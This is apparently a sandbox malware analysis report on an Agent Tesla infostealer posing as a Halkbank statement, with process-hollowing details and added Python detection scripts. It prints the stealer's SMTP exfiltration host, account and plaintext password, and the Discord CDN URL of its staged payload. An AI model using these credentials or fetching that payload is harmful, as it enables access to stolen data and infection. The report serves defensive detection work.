Analysis
- Max time kernel: 122s
- Max time network: 123s
- Platform: windows7_x64
- Resource: win7-20240903-en
- Resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- Submitted: 23/09/2024, 10:50 UTC
Static task: static1
Behavioral task behavioral1
- Sample: Halkbank_Ekstre_20240922_080921_689429.exe
- Resource: win7-20240903-en
Behavioral task behavioral2
- Sample: Halkbank_Ekstre_20240922_080921_689429.exe
- Resource: win10v2004-20240802-en
(The signatures, process tree and network capture below are from behavioral1, the Windows 7 x64 run.)
General
- Target: Halkbank_Ekstre_20240922_080921_689429.exe (the filename mimics a Halkbank account statement; "ekstre" is Turkish for "statement")
- Size: 110KB
- MD5: c8cea26640b2fa181571afd43c2e4477
- SHA1: 5b9e511450b327634fcc620814ebf42cb57b0c91
- SHA256: 261f4e785355cfd784f655fe0fc4a67be3cc18bb09e742b0187cfcc284fa5240
- SHA512: 20d9aca79e7034fdd1dbd2b785af17f973c0b9a2ab38dd40338dc0217754d2ea1fd6f00ad9d60bf761dc9d8c135acf32ebd9064facc3e0f3dc9790c3cbd00212
- SSDEEP: 1536:Y48kc/9ORkoOQzhSppeT//142G1Fq9uelIA630VDx:8kE9OuDp21DiqAEVDx
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: mail.zqamcx.com
- Port: 587
- Username: server1@zqamcx.com
- Password: Anambraeast@
- Email To: server@zqamcx.com
This is the stealer's exfiltration channel: harvested credentials are mailed through the attacker-controlled mailbox above over SMTP submission (port 587). The host, account and recipient are the actionable IoCs for outbound mail and DNS monitoring.
Signatures
-
AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and information stealer; the SMTP configuration extracted above is its exfiltration channel.
-
Credentials from Password Stores: Credentials from Web Browsers (1 TTP)
Malicious access to, or copying of, a web browser credential store.
-
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs such as FileZilla.
-
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers often target it.
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
-
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 4: ip-api.com
-
Suspicious use of SetThreadContext (1 IoC)
  PID 2068 (Halkbank_Ekstre_20240922_080921_689429.exe) set thread context of PID 2820 (RegAsm.exe, target procid 30)
-
System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by RegAsm.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by Halkbank_Ekstre_20240922_080921_689429.exe
-
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 2820 RegAsm.exe (2 occurrences)
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 2068 Halkbank_Ekstre_20240922_080921_689429.exe
  Token: SeDebugPrivilege, PID 2820 RegAsm.exe
-
Suspicious use of SetWindowsHookEx (1 IoC)
  PID 2820 RegAsm.exe
-
Suspicious use of WriteProcessMemory (12 IoCs)
  PID 2068 (Halkbank_Ekstre_20240922_080921_689429.exe) wrote to memory of PID 2820 (RegAsm.exe, target procid 30), 12 times
Taken together with the SetThreadContext call on the same target, the twelve writes are the classic process-hollowing sequence: the loader spawns RegAsm.exe, overwrites its memory with the payload, and redirects its thread to the injected code. Every later signature attributed to PID 2820 (process enumeration, SeDebugPrivilege, SetWindowsHookEx, the NLS\Language lookup) is therefore the Agent Tesla payload running under RegAsm.exe's name.
Processes
-
1. C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe (PID 2068)
   Command line: "C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"
   - Suspicious use of SetThreadContext
   - System Location Discovery: System Language Discovery
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 2820), child of 1
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
RegAsm.exe is started from the 32-bit framework directory (Framework, not Framework64) with no arguments, which the assembly registration tool never does on its own; combined with the parent's WriteProcessMemory and SetThreadContext calls into it, that is the hollowed host for the payload.
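The parent-to-child injection pattern recorded above can be turned into a detection over endpoint or sandbox telemetry. The following is an added example and not tria.ge code: the event records are constructed to mirror the report's signature rows (PIDs 2068 and 2820, twelve WriteProcessMemory calls, one SetThreadContext), the record field names and the list of .NET utilities treated as hollowing targets are this example's own assumptions.

```python
"""Flag a process that both writes into and redirects a thread of a child.

Added example (not from tria.ge). Event/process records are constructed to
match the report above; field names are assumptions of this example.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional
import ntpath

# .NET framework binaries commonly abused as hollowing hosts when spawned
# with no arguments. Assumption: illustrative list, extend from telemetry.
DOTNET_HOLLOW_TARGETS = {"regasm.exe", "regsvcs.exe", "msbuild.exe",
                         "installutil.exe", "aspnet_compiler.exe"}
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\")


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    ppid: Optional[int] = None


@dataclass
class Event:
    kind: str                   # WriteProcessMemory | SetThreadContext | AdjustPrivilegeToken
    pid: int                    # acting process
    target: Optional[int] = None
    detail: str = ""


# Constructed from the report: images, PIDs and counts match the signature rows.
PROCS = {
    2068: Proc(2068, r"C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe",
               r'"C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"'),
    2820: Proc(2820, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
               r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"', ppid=2068),
}
EVENTS = (
    [Event("AdjustPrivilegeToken", 2068, detail="SeDebugPrivilege")]
    + [Event("WriteProcessMemory", 2068, 2820)] * 12
    + [Event("SetThreadContext", 2068, 2820)]
    + [Event("AdjustPrivilegeToken", 2820, detail="SeDebugPrivilege")]
)


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _has_args(proc: Proc) -> bool:
    # A command line that is only the quoted image path carries no arguments.
    return proc.cmdline.strip().strip('"').lower() != proc.image.lower()


def detect_hollowing(procs, events):
    """Return (writer_pid, target_pid, reasons) for every target that the same
    process both wrote memory into and called SetThreadContext on."""
    writes = defaultdict(int)
    ctx = set()
    for e in events:
        if e.target is None:
            continue
        if e.kind == "WriteProcessMemory":
            writes[(e.pid, e.target)] += 1
        elif e.kind == "SetThreadContext":
            ctx.add((e.pid, e.target))

    findings = []
    for (src, dst), n in writes.items():
        if (src, dst) not in ctx:
            continue  # writes alone also come from debuggers and some installers
        reasons = [f"{n} WriteProcessMemory calls followed by SetThreadContext"]
        parent, child = procs.get(src), procs.get(dst)
        if child and _basename(child.image) in DOTNET_HOLLOW_TARGETS and not _has_args(child):
            reasons.append(f"{_basename(child.image)} launched with no arguments")
        if parent and parent.image.lower().startswith(USER_WRITABLE_PREFIXES):
            reasons.append("writer runs from a user-writable path")
        if child and child.ppid == src:
            reasons.append("target is a direct child of the writer")
        findings.append((src, dst, reasons))
    return findings


if __name__ == "__main__":
    for src, dst, reasons in detect_hollowing(PROCS, EVENTS):
        print(f"PID {src} -> PID {dst}: " + "; ".join(reasons))
```

Requiring both the memory writes and the thread-context change keeps the rule quiet on debuggers and crash handlers, which write but do not redirect; the three extra reasons (argument-less .NET host, user-writable parent path, direct parent-child relationship) are what separate this sample from a legitimate injector and are worth scoring separately.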
-
Network
-
DNS query to 8.8.8.8:53
  Request: cdn.discordapp.com IN A
  Response: 162.159.130.233, 162.159.134.233, 162.159.135.233, 162.159.129.233, 162.159.133.233
-
HTTPS request by Halkbank_Ekstre_20240922_080921_689429.exe to 162.159.130.233:443
  GET /attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a& HTTP/1.1
  Host: cdn.discordapp.com
  Connection: Keep-Alive
Response: HTTP/1.1 200 OK
  Content-Type: text/plain; charset=utf-8
  Content-Length: 327008
  Connection: keep-alive
  CF-Ray: 8c79f9fd4df894d5-LHR
  CF-Cache-Status: HIT
  Accept-Ranges: bytes, bytes
  Age: 10252
  Cache-Control: public, max-age=31536000
  Content-Disposition: attachment; filename="kingggggme.txt"
  ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
  Expires: Tue, 23 Sep 2025 10:50:54 GMT
  Last-Modified: Mon, 23 Sep 2024 07:59:58 GMT
  Vary: Accept-Encoding
  x-goog-generation: 1727078398052007
  x-goog-hash: crc32c=F3gHFg==
  x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
  x-goog-metageneration: 1
  x-goog-storage-class: STANDARD
  x-goog-stored-content-encoding: identity
  x-goog-stored-content-length: 327008
  x-guploader-uploadid: AD-8ljuSgJeARyAKoFDsjKGCmnOLdW0aNJZzRI-XUBfMXltfgMk3zNRc58-0aFwDSDQQW9Hc4x64KlpuOQ
  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
  Set-Cookie: __cf_bm=to9.io70Fy4VtcH4UvjpQtnTyfh9rG6nxLQE2CRgc9w-1727088655-1.0.1.1-HlUnKbYSOLV2yBU.Ivc9hM5SuhmGaC76lj6EQYe7Z98TOkq6kbsP4bUtrVWQ4Ljo8pqfyj_IvCfyEatZRVG64w; path=/; expires=Mon, 23-Sep-24 11:20:55 GMT; domain=.discordapp.com; HttpOnly; Secure
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3aCTlT8sIlx9yymfrEDvhfvvsHqquguEzyXSEvoyo6GWIhXiykyvTSXrPyIricZZPt9ea7YEuZFHEUOD7vh0f2LiWotl3WTtjAPEA36Mw6YjgrAz8UvDnmA%2F9%2Buqxnq23YMIA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Set-Cookie: _cfuvid=ZhBkIjWaxLEc95dtVyBMyvTl34Sx5QP1.eJC3t_dJ.4-1727088655050-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
  Server: cloudflare
The loader pulls a 327,008-byte "text" attachment from the Discord CDN before injecting into RegAsm.exe; the capture does not show the file's contents, but its size and timing mark it as the staged next stage. The Last-Modified header and x-goog-generation value (uploaded 2024-09-23 07:59:58 UTC) date the staging to under three hours before this submission, and the ETag and x-goog-hash md5 value are the same MD5 (1d67d8fd28fdc38b1606e7bd4c223a9d), usable to match the payload file on other hosts.
-
DNS query to 8.8.8.8:53
  Request: ip-api.com IN A
  Response: 208.95.112.1
-
HTTP request by Halkbank_Ekstre_20240922_080921_689429.exe to 208.95.112.1:80
  GET /line/?fields=hosting HTTP/1.1
  Host: ip-api.com
  Connection: Keep-Alive
Response: HTTP/1.1 200 OK
  Content-Type: text/plain; charset=utf-8
  Content-Length: 6
  Access-Control-Allow-Origin: *
  X-Ttl: 60
  X-Rl: 44
The fields=hosting query asks ip-api.com only whether the caller's public address belongs to a hosting or datacenter range, a common sandbox and VPS check; the 6-byte plain-text body is consistent with the line-format answer "false" followed by a newline.
-
Flow summary (remote address, protocols, process, bytes sent / received, packets sent / received, request)
  162.159.130.233:443  tls, http  Halkbank_Ekstre_20240922_080921_689429.exe  7.4 kB / 344.6 kB  150 / 261
    GET https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&  status 200
  208.95.112.1:80  http  Halkbank_Ekstre_20240922_080921_689429.exe  356 B / 347 B  6 / 4
    GET http://ip-api.com/line/?fields=hosting  status 200
  8.8.8.8:53  dns  64 B / 144 B  1 / 1
    DNS request cdn.discordapp.com; response 162.159.130.233, 162.159.134.233, 162.159.135.233, 162.159.129.233, 162.159.133.233
  8.8.8.8:53  dns  56 B / 72 B  1 / 1
    DNS request ip-api.com; response 208.95.112.1
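Two pieces of the capture above are worth reducing to code: the Discord CDN attachment link, whose is and ex parameters are hex Unix timestamps (an observation about these signed links, not something Discord documents), and the pairing of a large text/plain download from the Discord CDN with an ip-api.com hosting check by the same process. The following is an added example, not tria.ge code. The flow records are constructed from the report; the first flow's timestamp is taken from the 1727088655 value embedded in the __cf_bm cookie (2024-09-23 10:50:55 UTC), the second is assumed, and the record field names are this example's own.

```python
"""Decode a Discord CDN attachment URL and correlate it with an ip-api.com
hosting check. Added example, not tria.ge code; flow records are constructed
from the report above and field names are this example's assumptions."""
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

ATTACHMENT_URL = ("https://cdn.discordapp.com/attachments/1265592680700711006/"
                  "1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd"
                  "&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&")


def parse_discord_attachment(url):
    """Split the path into channel id / attachment id / filename and decode the
    `is` (issued) and `ex` (expires) hex timestamps; `hm` is the signature."""
    u = urlsplit(url)
    parts = u.path.strip("/").split("/")
    if u.hostname != "cdn.discordapp.com" or len(parts) != 4 or parts[0] != "attachments":
        raise ValueError("not a Discord CDN attachment URL")
    q = parse_qs(u.query)
    issued = datetime.fromtimestamp(int(q["is"][0], 16), tz=timezone.utc)
    expires = datetime.fromtimestamp(int(q["ex"][0], 16), tz=timezone.utc)
    return {"channel_id": parts[1], "attachment_id": parts[2], "filename": parts[3],
            "issued": issued, "expires": expires, "validity": expires - issued,
            "signature": q.get("hm", [""])[0]}


# Constructed flow records. Timestamps: first from the __cf_bm cookie, second assumed.
FLOWS = [
    {"t": datetime(2024, 9, 23, 10, 50, 55, tzinfo=timezone.utc),
     "proc": "Halkbank_Ekstre_20240922_080921_689429.exe", "host": "cdn.discordapp.com",
     "url": ATTACHMENT_URL, "status": 200, "content_type": "text/plain; charset=utf-8",
     "length": 327008},
    {"t": datetime(2024, 9, 23, 10, 50, 58, tzinfo=timezone.utc),
     "proc": "Halkbank_Ekstre_20240922_080921_689429.exe", "host": "ip-api.com",
     "url": "http://ip-api.com/line/?fields=hosting", "status": 200,
     "content_type": "text/plain; charset=utf-8", "length": 6},
]


def suspicious_flows(flows, window=timedelta(minutes=5), min_stage_bytes=64 * 1024):
    """Per process: a large text/plain Discord attachment fetch, scored higher
    when an ip-api.com hosting check follows it within `window`."""
    by_proc = {}
    for f in flows:
        by_proc.setdefault(f["proc"], []).append(f)
    findings = []
    for proc, fs in by_proc.items():
        fs.sort(key=lambda f: f["t"])
        geo = [f for f in fs if f["host"] == "ip-api.com" and "fields=hosting" in f["url"]]
        for s in fs:
            if (s["host"] != "cdn.discordapp.com" or "/attachments/" not in s["url"]
                    or not s["content_type"].startswith("text/plain")
                    or s["length"] < min_stage_bytes):
                continue
            meta = parse_discord_attachment(s["url"])
            reasons = [f"{s['length']} bytes of text/plain fetched as attachment {meta['filename']}",
                       f"link issued {meta['issued']:%Y-%m-%d %H:%M:%S}Z, valid {meta['validity']}"]
            if any(timedelta(0) <= g["t"] - s["t"] <= window for g in geo):
                reasons.append("ip-api.com hosting check within window of the fetch")
            findings.append((proc, meta["attachment_id"], reasons))
    return findings


if __name__ == "__main__":
    for proc, att, reasons in suspicious_flows(FLOWS):
        print(f"{proc} attachment {att}: " + "; ".join(reasons))
```

Decoding is=66f11ffd gives 2024-09-23 07:59:57 UTC, one second before the Last-Modified value in the response, so the link was minted when the file was uploaded, and ex=66f2717d is exactly 24 hours later: the signed URL embedded in the loader only works for a day, which is why re-running an older sample of this kind often yields a 404 rather than the payload. The hosting check is scored as a modifier rather than a trigger on its own, since legitimate software also queries ip-api.com.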